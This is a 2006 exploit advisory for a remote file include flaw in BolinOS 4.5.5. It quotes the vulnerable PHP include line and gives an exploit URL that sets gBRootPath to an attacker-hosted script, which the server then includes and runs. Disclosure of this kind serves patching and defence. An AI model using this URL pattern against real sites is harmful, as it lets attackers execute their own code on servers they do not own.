BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

2006-09-18T00:00:00
ID SECURITYVULNS:DOC:14307
Type securityvulns
Reporter Securityvulns
Modified 2006-09-18T00:00:00

Description

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron (turkish hacker) + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Class : Remote + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Vuln Code: include ($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"]."/system/_b/contentFiles/gBLib.php"); + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Exploit: http://www.site.com/[script path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts? + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, gьltekin, R3D4C!D, DaRK, insomnia, mirim, Dreamlord, =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

milw0rm.com [2006-09-15]